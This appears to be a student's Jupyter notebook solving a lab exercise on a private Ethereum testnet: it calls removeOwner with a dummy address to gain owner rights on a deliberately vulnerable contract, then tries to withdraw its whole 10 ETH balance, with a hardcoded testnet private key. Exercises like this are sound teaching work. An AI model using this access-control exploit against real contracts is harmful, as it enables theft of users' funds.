In [1]:
from web3 import Web3
from eth_account import Account

# Connect to the Ethereum testnet
web3 = Web3(Web3.HTTPProvider('http://geth-client:8545/'))
from web3.middleware import geth_poa_middleware  # web3 version 6.20.2

# Check connection
print("Connected:", web3.is_connected())

web3.middleware_onion.inject(geth_poa_middleware, layer=0)

Connected: True


In [4]:
# Use your private key from Anvil or Geth
PRIVATE_KEY = "0xca7a5a846f5c2583fe98d5ad2b351fc0e7cfb0b587fbb449b9da2ebf5e5fdbec"
ACCOUNT = web3.eth.account.from_key(PRIVATE_KEY)
ACCOUNT_ADDRESS = ACCOUNT.address

print("Using account:", ACCOUNT_ADDRESS)

Using account: 0x69C12857c91808d45d704100911a19FDf335B29f


In [6]:
# Target contract address (replace with actual address)
TARGET_CONTRACT = "0x096191b25F5F1b8BfFdE32DD881C14e10FE5a838"

# ABI for the vulnerable contract (minimal version)
ABI = [{"inputs":[{"internalType":"address","name":"_student","type":"address"}],"stateMutability":"payable","type":"constructor"},{"inputs":[{"internalType":"address","name":"newowner","type":"address"}],"name":"addOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deposit","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"getStudent","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"testowner","type":"address"}],"name":"isOwner","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"oldowner","type":"address"}],"name":"removeOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"student","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

# Load the contract
contract = web3.eth.contract(address=TARGET_CONTRACT, abi=ABI)

In [7]:
student_address = contract.functions.getStudent().call()
print(f"Student address: {student_address}")

if student_address == ACCOUNT_ADDRESS:
    print("You are the right student!")
else:
    print("You are NOT the right student.")

Student address: 0x69C12857c91808d45d704100911a19FDf335B29f
You are the right student!


In [8]:
# Dummy address (can be any address except your own)
DUMMY_ADDRESS = "0x0000000000000000000000000000000000004321"

# Step 1: Build the transaction
tx1 = contract.functions.removeOwner(DUMMY_ADDRESS).build_transaction({
    'from': ACCOUNT_ADDRESS,
    'gas': 100000,
    'gasPrice': web3.to_wei('5', 'gwei'),
    'nonce': web3.eth.get_transaction_count(ACCOUNT_ADDRESS),
})

# Step 2: Sign the transaction
signed_tx1 = web3.eth.account.sign_transaction(tx1, PRIVATE_KEY)

# Step 3: Send the transaction
tx_hash1 = web3.eth.send_raw_transaction(signed_tx1.rawTransaction)
print("removeOwner() TX:", web3.to_hex(tx_hash1))

# Step 4: Wait for the transaction to be mined
tx_receipt1 = web3.eth.wait_for_transaction_receipt(tx_hash1)
print("Transaction receipt:", tx_receipt1)

# Step 5: Verify that you are now an owner
is_owner = contract.functions.isOwner(ACCOUNT_ADDRESS).call()
print("Am I the owner?", is_owner)

removeOwner() TX: 0x276b7488575503d057868e49abba5e9fc5f80a4f9ac70ef6a01cb5a5096428b1
Transaction receipt: AttributeDict({'blockHash': HexBytes('0x80909297cc795653449df7327cef606a117be2feb36c3aa0a36e5c51f60403a6'), 'blockNumber': 318389, 'contractAddress': None, 'cumulativeGasUsed': 48484, 'from': '0x69C12857c91808d45d704100911a19FDf335B29f', 'gasUsed': 48484, 'logs': [], 'logsBloom': HexBytes('0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'), 'status': 1, 'to': '0x096191b25F5F1b8BfFdE32DD881C14e10FE5a838', 'transactionHash': H

In [10]:
# Step 1: Get the full contract balance
contract_balance = web3.eth.get_balance(TARGET_CONTRACT)
print("Contract Balance:", web3.from_wei(contract_balance, 'ether'), "ETH")

# Step 2: Withdraw all available funds
tx2 = contract.functions.withdraw(contract_balance).build_transaction({
    'from': ACCOUNT_ADDRESS,
    'gas': 100000,
    'gasPrice': web3.to_wei('5', 'gwei'),
    'nonce': web3.eth.get_transaction_count(ACCOUNT_ADDRESS),
})

# Step 3: Sign and send the transaction
signed_tx2 = web3.eth.account.sign_transaction(tx2, PRIVATE_KEY)
tx_hash2 = web3.eth.send_raw_transaction(signed_tx2.rawTransaction)

print("Withdraw() TX:", web3.to_hex(tx_hash2))

Contract Balance: 10 ETH
Withdraw() TX: 0x4944b81c20a5cca20c469fbc3591ef2cd042d32c1ae002b7b8b008e418b92687


In [11]:
# Check the updated contract balance
contract_balance = web3.eth.get_balance(TARGET_CONTRACT)
print("Contract Balance:", web3.from_wei(contract_balance, 'ether'), "ETH")

Contract Balance: 10 ETH
